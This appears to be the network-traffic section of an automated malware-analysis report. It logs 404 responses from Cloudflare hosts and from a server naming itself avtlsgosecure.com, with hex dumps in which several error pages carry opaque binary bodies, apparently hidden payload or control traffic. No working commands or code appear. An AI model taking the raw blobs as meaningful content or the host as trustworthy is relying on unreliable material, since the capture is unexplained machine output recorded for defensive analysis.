                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=65wTixgQCVrdomjCkVKJ7TSMtzbH4CsUGEvFxgg1qB7oZlfR9TRjZFOJc2vP9np%2FMEj35fyeNLOtl3%2BDJr4r0wpKzaovSk9ABB3TZ56N3sxjSIhQbHYJZ5pVYhljLcgM4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e1997606d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yiHLB0muGZOWOS1UV%2FZ6%2FxBSP4kFNUgzgmMPY39sAPx9z06Lh5JuDfHt8%2BH1sbkZVBeIKcBujy5Fs%2FWgtJdkr9xK0Igud8Anyw%2BoJ0pr9fs1Kq0VUydzwS7JmIEv55ID4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e27ad706d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 38 33 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 00 59 3e b0 19 c6 28 d9 b5 96 d3 15 69 05 0f d6 f2 97 ac f7 97 3b e2 df 61 23 30 54 2d f5 09 16 69 6c 32 60 e0 dd 6d 61 12 2a 85 19 5e f7 6b db 89 b2 07 5a b1 a4 07 0d ab 17 c4 f8 48 7c e1 66 90 cc f8 83 53 34 77 70 36 f8 37 33 62 97 23 f5 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a ac 6a 09 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d f9 53 2b e5 d3 94 7b 7e 45 f7 ff 7e 2c 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d d0 57 19 e0 28 95 a9 38 14 f1 96 bc 25 51 e0 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 6e 9f 32 6c 01 7c 0a 8d c7 0d fc 0e 7c a0 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 9f 08 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 21 ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 ad df 13 51 8c 60 17 4b 81 9b de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e e6 9e 07 ee c3 ce 55 a3 4c 37 84 1f d4 a8 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a 15 af 7f 74 79 a0 75 43 cc f5 8b 8b e1 7c 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 Data Ascii: 3830`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*Y>(i;a#0T-il2`ma*^kZH|fS4wp673b#p"XJcb>Y Zj[V?#B7PRS+{~E~,U$a|l~_DzW(8%Q.|8HkJ{/a]F4
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OJJMFUDHfK88ejDb3ssSgFlIiEfC3o%2FsibgdQSJX%2Bj5YP9NLc75w8mjBAVXgyOiGaz5xhN1OBkqQMjxU1YMvnY%2BlcycxsRry5NM3%2BM1b%2B3nAdax6pmmNprEk1hp7Mmd%2F5g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e7fb9506d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=aZKHvJvCVDCzxhjWf5J7Z9xbZ3ssVz0tZAOE%2BAhaTk6DEEA82yxzyjC%2BpHWjq0J0nQOyRFRkwLq6FGHh2WrIAX2GwKoR5X8WIXpKW6u5q3U8EWmHbSz46SbVBrXwl6b1Xw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba7e92d8406d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 34 64 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 e2 82 15 fc d0 33 a4 53 f6 c7 35 f3 73 07 03 d2 ef f9 fb fa eb b1 87 6a cd 15 3d 33 d1 8c 77 45 7c 1f 57 44 d5 2d 97 3c 50 25 51 fe 08 22 b9 3f 19 66 3d 28 2a 97 6a dd d6 bc db 43 17 5c 53 a6 cd f6 4d 55 62 91 54 5b fd 55 19 d0 ed e5 10 b1 17 26 58 4a 33 4f 62 3e 17 21 2b da a3 06 83 3a 56 3f cb 00 23 ae 42 15 d7 07 53 53 fa cb 0f 9e 1d 09 52 2b e5 9d 83 7b 7e 45 f7 ff 78 8d 55 db d4 0d 13 13 bf 1e e1 92 24 08 4f c5 03 af 87 a1 c1 7e de f5 69 b9 19 17 7e 5f af 9a 15 16 a9 a0 91 31 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 75 74 bf 76 34 fd f8 92 3d 53 6c 19 7d 0a 8d c7 fd e4 0e a4 eb 7e 71 eb a0 b2 1a b8 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 9c 01 6b 49 0d 92 90 f7 33 d4 e2 e7 72 3b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 f9 48 15 cc 81 99 bd 34 49 ce ba 68 58 94 fc 9d 7f 3f 5b 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 b1 8a 64 f1 33 54 73 25 ed 70 17 4b 65 f2 df 8e 82 e1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 04 99 85 1f d4 dc 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 72 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c 78 66 e3 52 48 e4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 0d c3 fd d4 5f 59 6a 43 9c 39 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3 Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j3S5sj=3wE|WD-<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vkHqKg5vyXTimHZFe9tYdqMPuqfUY%2Fpg1rG8PBkOrVnw1Y9bIBgDBAnzaPSgrCYUG86718Mr4lfZNwg7zuRNN9zxFXE3QXVUSwcrxLhwLa6eNaKlXUkXtWzrwHPHWFgLog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba805de2806d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:11 GMTserver: Apache/2.4.41 (Ubuntu)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 32 42 34 33 0d 0a 53 00 00 00 8f 3b 45 34 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:12 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 73content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3 Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:16 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 44content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 9b eb 8b f1 32 ae ce 95 a4 68 Data Ascii: %S`Nh&WQY^]eu2h
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:20 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:21 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 39content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 c6 a4 83 ec 24 Data Ascii: %S`Nh&WQY^]eu$
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 